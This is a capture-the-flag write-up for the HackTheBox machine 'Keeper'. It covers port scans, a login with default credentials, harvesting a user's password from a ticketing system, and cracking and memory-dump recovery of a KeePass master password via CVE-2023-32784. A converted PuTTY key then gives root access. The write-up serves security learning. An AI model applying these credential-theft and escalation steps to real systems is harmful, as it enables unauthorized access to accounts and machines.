Keeper - wook413

#hackthebox #easy #linux #keepass #puttygen #putty-tools ![[Pasted image 20250729220616.png]] # Information Gathering Started off with a TCP scan against all 65,535 ports ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ nmap -Pn -n --open $IP --min-rate 3000 -p- Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-30 01:02 UTC Nmap scan report for 10.10.11.227 Host is up (0.048s latency). Not shown: 65533 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http Nmap done: 1 IP address (1 host up) scanned in 14.59 seconds ``` Hit 2 open ports. Let's perform another TCP scan but this time only against the 2 open ports found. ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ nmap -sCV $IP -p 22,80 Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-30 01:04 UTC Nmap scan report for 10.10.11.227 Host is up (0.24s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 256 35:39:d4:39:40:4b:1f:61:86:dd:7c:37:bb:4b:98:9e (ECDSA) |_ 256 1a:e9:72:be:8b:b1:05:d5:ef:fe:dd:80:d8:ef:c0:66 (ED25519) 80/tcp open http nginx 1.18.0 (Ubuntu) |_http-title: Site doesn't have a title (text/html). |_http-server-header: nginx/1.18.0 (Ubuntu) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 8.94 seconds ``` Finally a UDP scan against top 10 ports ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ nmap -sU $IP --top-ports 10 Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-30 01:05 UTC Nmap scan report for 10.10.11.227 Host is up (0.047s latency). PORT STATE SERVICE 53/udp closed domain 67/udp closed dhcps 123/udp closed ntp 135/udp closed msrpc 137/udp open|filtered netbios-ns 138/udp closed netbios-dgm 161/udp closed snmp 445/udp closed microsoft-ds 631/udp closed ipp 1434/udp open|filtered ms-sql-m Nmap done: 1 IP address (1 host up) scanned in 5.05 seconds ``` # Enumeration ##### HTTP - TCP 80 Since there are only 2 open ports: 22 and 80, I'll start hunting for information on port 80. Upon landing, there's nothing but a hyperlink on the website. ![[Pasted image 20250729200839.png]] The link takes you to `tickets.keeper.htb/rt` but doesn't load anything. Let's add it to `/etc/hosts` and see if it resolves the issue. ![[Pasted image 20250729201137.png]] ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ echo '10.10.11.227 tickets.keeper.htb' | sudo tee -a /etc/hosts [sudo] password for kali: 10.10.11.227 tickets.keeper.htb ``` Alright, now it loaded contents and there's a login form. ![[Pasted image 20250729201414.png]] I searched for `best practical default credentials` and found the official forum of `best practical` where they talk about default credentials. ![[Pasted image 20250729202747.png]]![[Pasted image 20250729202928.png]] Got a hint from the forum, I tried `root:password` in the login form, and I successfully got in! ![[Pasted image 20250729203051.png]] # Initial Access - Shell as `lnorgaard` Under `Admin` tab, I found another user named `lnorgaard` besides `root` ![[Pasted image 20250729203126.png]] I noticed the `name` was clickable, so I did click on the username to gather more information and I found the user's initial password. ![[Pasted image 20250729203758.png]] ![[Pasted image 20250729204011.png]] Found `user.txt` ```bash lnorgaard@keeper:~$ ls RT30000.zip user.txt lnorgaard@keeper:~$ cat user.txt 4e3c... ``` # Privilege Escalation There's another file in `/home/lnorgaard` besides `user.txt`, `RT30000.zip`. Using `unzip -l` command, I can see the contents inside the `.zip` file without extracting it first. There are two files: `KeePassDumpFull.dmp` and `passcodes.kdbx` Let's extract those files. ```bash lnorgaard@keeper:~$ ls RT30000.zip user.txt lnorgaard@keeper:~$ file RT30000.zip RT30000.zip: Zip archive data, at least v2.0 to extract, compression method=deflate lnorgaard@keeper:~$ unzip -l RT30000.zip Archive: RT30000.zip Length Date Time Name --------- ---------- ----- ---- 253395188 2023-05-24 12:51 KeePassDumpFull.dmp 3630 2023-05-24 12:51 passcodes.kdbx --------- ------- 253398818 2 files ``` I'm more interested in `passcodes.kdbx` because we can try cracking it without password using `keepass2john` and `JtR`. Let's put the dump file aside for now. ```bash lnorgaard@keeper:~$ file KeePassDumpFull.dmp KeePassDumpFull.dmp: Mini DuMP crash report, 16 streams, Fri May 19 13:46:21 2023, 0x1806 type lnorgaard@keeper:~$ file passcodes.kdbx passcodes.kdbx: Keepass password database 2.x KDBX ``` I'm going to transfer the Keepass password database file to my kali via `SSH` ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ scp lnorgaard@$IP:/home/lnorgaard/passcodes.kdbx . [email protected]'s password: passcodes.kdbx 100% 3630 38.6KB/s 00:00 ┌──(kali㉿kali)-[~/Desktop] └─$ ls -l passcodes.kdbx -rwxr-x--- 1 kali kali 3630 Jul 30 01:49 passcodes.kdbx ``` Converted `.kdbx` file to `hash` with `keepass2john` ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ keepass2john passcodes.kdbx > passcodes.hash ┌──(kali㉿kali)-[~/Desktop] └─$ cat passcodes.hash passcodes:$keepass$*2*60000*0*5d7b4747e5a278d572fb0a66fe187ae5d74a0e2f56a2aaaf4c4f2b8ca342597d*5b7ec1cf6889266a388abe398d7990a294bf2a581156f7a7452b4074479bdea7*08500fa5a52622ab89b0addfedd5a05c*411593ef0846fc1bb3db4f9bab515b42e58ade0c25096d15f090b0fe10161125*a4842b416f14723513c5fb704a2f49024a70818e786f07e68e82a6d3d7cdbcdc ``` I tried cracking the hash with `john` and it was taking so much time. I believe this isn't the right way to solve the box. I am now turning to the dump file. The dump file is too large, it's nearly impossible to find useful information out of there even If I used `strings` command to extract only human-readable data. I looked at the file type of the keepass DB file again: `Keepass password database 2.x KDBX` ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ file passcodes.kdbx passcodes.kdbx: Keepass password database 2.x KDBX ``` Apparently, there was a known vulnerability to this version of `Keepass`: `CVE-2023-32784` ![[Pasted image 20250729213436.png]] The original poc code is written in `.NET`, but I'm going to use a Python version which you can download from [here](https://github.com/matro7sh/keepass-dump-masterkey) Running the poc, it returned multiple possible passwords. The author of the exploit mentioned that the exploit is not able to find the first character of the password, so we would have to brute-force the very first character. ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ python3 poc.py -d KeePassDumpFull.dmp 2025-07-30 02:35:59,759 [.] [main] Opened KeePassDumpFull.dmp Possible password: ●,dgr●d med fl●de Possible password: ●ldgr●d med fl●de Possible password: ●`dgr●d med fl●de Possible password: ●-dgr●d med fl●de Possible password: ●'dgr●d med fl●de Possible password: ●]dgr●d med fl●de Possible password: ●Adgr●d med fl●de Possible password: ●Idgr●d med fl●de Possible password: ●:dgr●d med fl●de Possible password: ●=dgr●d med fl●de Possible password: ●_dgr●d med fl●de Possible password: ●cdgr●d med fl●de Possible password: ●Mdgr●d med fl●de ``` I just searched for `drgrod med flode` on Google instead and it returned the following: ![[Pasted image 20250729213959.png]] `Rødgrød med fløde` is Danish Red Berry Pudding. This makes sense because we saw the user `lnorgaard` or `Lise Nørgaard` is Danish. ![[Pasted image 20250729214222.png]] I entered `rødgrød med fløde` as the password and I was in :) ![[Pasted image 20250729214522.png]] I found a `password` which I tried on SSH for `root` and it did not work. In the `Notes` section, It says `PuTTY-User-Key-File-3:ssh-rsa` at the very top. I think I would have to login as `root` using this key file. ![[Pasted image 20250729215133.png]] I learned that in order to use this key, I would have to convert it to a format that `OpenSSH` can understand. `puttygen` can help us to do so. `puttygen` comes with the `putty-tools` package. I installed `putty-tools` with the following command: `sudo apt install putty-tools` We can convert it to `OpenSSh private key` using `-O` flag. ![[Pasted image 20250729215750.png]] Now I have the OpenSSH private key. Let's try logging into SSH as `root` with the key. ![[Pasted image 20250729220403.png]] Logged in as `root`! ![[Pasted image 20250729220516.png]] Got `root.txt` ```bash root@keeper:~# cd /root root@keeper:~# ls root.txt RT30000.zip SQL root@keeper:~# cat root.txt 5cc... ```